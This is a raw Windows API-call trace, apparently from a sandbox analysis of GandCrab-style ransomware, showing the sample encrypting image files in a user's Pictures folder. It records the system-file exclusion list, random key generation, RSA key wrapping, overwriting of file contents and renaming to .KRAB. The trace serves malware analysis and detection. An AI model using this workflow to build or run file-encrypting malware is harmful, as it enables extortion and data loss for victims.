lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="4t81U0hD63I8tMdh7X.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png" [0097.446] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.446] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png.KRAB") returned 78 [0097.446] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png") returned 73 [0097.446] lstrlenW (lpString=".png") returned 4 [0097.446] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.446] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.447] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png") returned 73 [0097.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png") returned 73 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="desktop.ini") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="autorun.inf") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="ntuser.dat") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="iconcache.db") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="bootsect.bak") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="boot.ini") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="ntuser.dat.log") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="thumbs.db") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="KRAB-DECRYPT.html") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="ntldr") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="NTDETECT.COM") returned -1 [0097.447] lstrcmpiW (lpString1="4t81U0hD63I8tMdh7X.png", lpString2="Bootfont.bin") returned -1 [0097.447] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.447] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10111b0) returned 1 [0097.448] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.448] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.449] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.449] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.449] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0097.449] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.449] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0097.449] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.450] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.450] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.450] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.450] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.450] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.450] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0097.451] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.451] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.451] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.451] GetLastError () returned 0x0 [0097.451] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.451] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.451] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0097.451] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.451] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.451] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.452] GetLastError () returned 0x0 [0097.452] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.452] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.452] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\4t81u0hd63i8tmdh7x.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.452] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.453] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.453] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x17076, lpOverlapped=0x0) returned 1 [0097.466] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe8f8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.466] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x17076, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x17076, lpOverlapped=0x0) returned 1 [0097.466] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.466] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.471] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.472] CloseHandle (hObject=0x3a8) returned 1 [0097.472] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.472] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\4t81u0hd63i8tmdh7x.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\4t81U0hD63I8tMdh7X.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\4t81u0hd63i8tmdh7x.png.krab")) returned 1 [0097.473] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.473] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.473] lstrcmpW (lpString1="8TUdLIP.bmp", lpString2=".") returned 1 [0097.473] lstrcmpW (lpString1="8TUdLIP.bmp", lpString2="..") returned 1 [0097.473] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="8TUdLIP.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp" [0097.474] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.474] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp.KRAB") returned 67 [0097.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp") returned 62 [0097.474] lstrlenW (lpString=".bmp") returned 4 [0097.474] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.474] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.474] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp") returned 62 [0097.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp") returned 62 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="desktop.ini") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="autorun.inf") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="ntuser.dat") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="iconcache.db") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="bootsect.bak") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="boot.ini") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="ntuser.dat.log") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="thumbs.db") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="ntldr") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="NTDETECT.COM") returned -1 [0097.475] lstrcmpiW (lpString1="8TUdLIP.bmp", lpString2="Bootfont.bin") returned -1 [0097.475] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.475] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.476] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.476] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.476] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.477] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.477] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.477] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.477] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0097.477] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.478] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.478] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.478] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.478] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.478] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.478] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10112c0) returned 1 [0097.479] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.479] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.479] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.479] GetLastError () returned 0x0 [0097.479] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.479] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0097.479] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10110a0) returned 1 [0097.480] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.480] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.480] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.480] GetLastError () returned 0x0 [0097.480] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.480] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0097.480] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\8tudlip.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.481] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.481] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.481] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x166c6, lpOverlapped=0x0) returned 1 [0097.494] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe993a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.495] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x166c6, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x166c6, lpOverlapped=0x0) returned 1 [0097.495] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.495] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.498] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.499] CloseHandle (hObject=0x3a8) returned 1 [0097.499] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.499] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\8tudlip.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\8TUdLIP.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\8tudlip.bmp.krab")) returned 1 [0097.500] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.501] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.501] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0097.501] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0097.501] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\d2ca4a08d2ca4dee3d.lock" [0097.501] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.501] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 79 [0097.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\d2ca4a08d2ca4dee3d.lock") returned 74 [0097.501] lstrlenW (lpString=".lock") returned 5 [0097.502] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.502] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0097.502] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.502] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.502] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.502] lstrcmpW (lpString1="JOb0TwYbdocjGXq.gif", lpString2=".") returned 1 [0097.502] lstrcmpW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="..") returned 1 [0097.503] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="JOb0TwYbdocjGXq.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif" [0097.503] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.503] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif.KRAB") returned 75 [0097.503] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif") returned 70 [0097.503] lstrlenW (lpString=".gif") returned 4 [0097.503] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.503] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0097.503] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.504] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif") returned 70 [0097.504] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\JOb0TwYbdocjGXq.gif") returned 70 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="desktop.ini") returned 1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="autorun.inf") returned 1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="ntuser.dat") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="iconcache.db") returned 1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="bootsect.bak") returned 1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="boot.ini") returned 1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="ntuser.dat.log") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="thumbs.db") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="ntldr") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="NTDETECT.COM") returned -1 [0097.504] lstrcmpiW (lpString1="JOb0TwYbdocjGXq.gif", lpString2="Bootfont.bin") returned 1 [0097.504] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.504] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10114e0) returned 1 [0097.505] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.505] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.505] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.505] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.506] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.506] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.506] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0097.506] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.507] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.507] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.507] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.507] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.507] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.507] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0097.508] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.508] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.508] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.508] GetLastError () returned 0x0 [0097.508] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.508] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.508] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0097.509] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: 